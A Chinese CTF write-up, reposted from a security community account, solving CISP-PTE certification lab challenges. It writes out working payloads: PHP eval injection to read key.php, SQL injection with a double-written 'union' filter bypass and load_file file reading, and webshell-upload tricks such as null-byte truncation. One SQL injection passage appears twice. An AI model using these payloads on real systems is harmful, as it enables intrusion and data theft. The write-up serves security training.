今天是虎年开工第一天!
祝您如虎添翼,开工大吉!
七星高照,万事可期!
大年初七开门红,虎虎生威发大财!
通过你所学到的知识,通过执行Linux命令获取webshell,答案就在根目录下key.php文件中。请开始答题!
a | ba || ba && ba&b
https://blog.csdn.net/weixin_31106267/article/details/116590213
<?phperror_reporting(0);$a=@$_REQUEST['hello'];eval("var_dump($a);");show_source(__FILE__);?>
?hello=);print_r(file("key.php")?hello=);var_dump(file("key.php")
上传测试,仅可以上传png图片,但是重新更改后缀名称,除了php基本上都可以,可以判断出该文件上传起码有三个条件:
-
上传的文件必须为图片马 -
检测也是基于内容的检测,图片马中的木马也需要是变形的。 -
上传图片木马,然后修改后缀即可
随便输入,可以发现并没有过滤什么内容,输入id=1'
select * from article where (id like '%1'%')
?id=1%27)%20order%20by%204%20--+
测试在order by 5的时候报错,说明有四个字段,其实这种情况下直接猜测就可以,页面首先三个字段,标题、作者和内容。那么就直接使用开始进行手工注入。
?id=-1%27)%20union%20select%201,2,3,4%20--+
根据回显发现过滤掉了union,那么比较简单双写就可以绕过了。
?id=-1%27)%20ununionion%20select%201,database(),3,4%20--+
成功爆出数据库名,根据题目提示需要读取文件,那么使用load_file去读文件就ok了,构造payload。
?id=-1%27)%20ununionion%20select%201,load_file(%27/tmp/key%27),3,4%20--+
随便输入,可以发现并没有过滤什么内容,输入id=1'
select * from article where (id like '%1'%')
?id=1%27)%20order%20by%204%20--+
测试在order by 5的时候报错,说明有四个字段,其实这种情况下直接猜测就可以,页面首先三个字段,标题、作者和内容。那么就直接使用开始进行手工注入。
?id=-1%27)%20union%20select%201,2,3,4%20--+根据回显发现过滤掉了union,那么比较简单双写就可以绕过了。
?id=-1%27)%20ununionion%20select%201,database(),3,4%20--+
成功爆出数据库名,根据题目提示需要读取文件,那么使用load_file去读文件就ok了,构造payload。
?id=-1%27)%20ununionion%20select%201,load_file(%27/tmp/key%27),3,4%20--+
http://192.168.100.180:81/start/index.php
进行闭合尝试,在尝试payload
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6%27%20and%20%271%27=%271
即
uid=xxxxx' or '1'='1
http://192.168.100.180:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' UNION SELECT 1,2,3,4,5,6 and '1'='1
测试该数据库有6个字段,开始爆库
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' UNION SELECT 1,2,database(),4,5,6 and '1'='1
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),4,5,6 and '1'='1
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='IS_KEY'),4,5,6 and '1'='1
?uuid=-983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,(select group_concat(haha) from IS_KEY),4,5,6 and '1'='1
http://192.168.100.180:82/start/
上传一句话木马文件不行,上传一句话00截断上传失败,需上传马明命名之后进行00截断即可。
http://10.10.114.230/PTE/3.File_Include1/page.php
<?phperror_reporting(0);$a=@$_REQUEST['hello'];eval("var_dump($a);");show_source(__FILE__);?>
比较简单,分析源码就是get传入参数hello,通过eval去执行dump命令,那么直接构造参数内容,想要执行var_dump($a),hello参数的内容首先就是先闭合var_dump函数,再利用“ ; ”,去拼接一条命令即可,后面拼接的命令就可以使用var_dump打印或者print_r打印,打印的内容就是key.php的内容,payload如下:
?hello=);print_r(file("key.php")?hello=);var_dump(file("key.php")
内容比较基础,但总的来说东西比较系统,不一定三个小时能够毫无准备的顺利解决基础+综合,另外祝大家开工大吉!
火线Zone是[火线安全平台]运营的封闭式实战安全攻防社区,研究讨论实战攻防技术,平台向顶尖的白帽子提供安全测试的云端基础设施,目前火线的高级白帽子数量已经近万人,欢迎具备分享和探索精神的白帽子加入火线Zone社区,共建一个有技术氛围的优质社区!
如需转载火线Zone公众号内的文章请联系火线小助手:hxanquan(微信)
扫码关注我们
戳这里,加入社区,共建一个有技术氛围的优质社区!
原文始发于微信公众号(火线Zone):CISP-PTE认证中遇到的CTF题目及WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论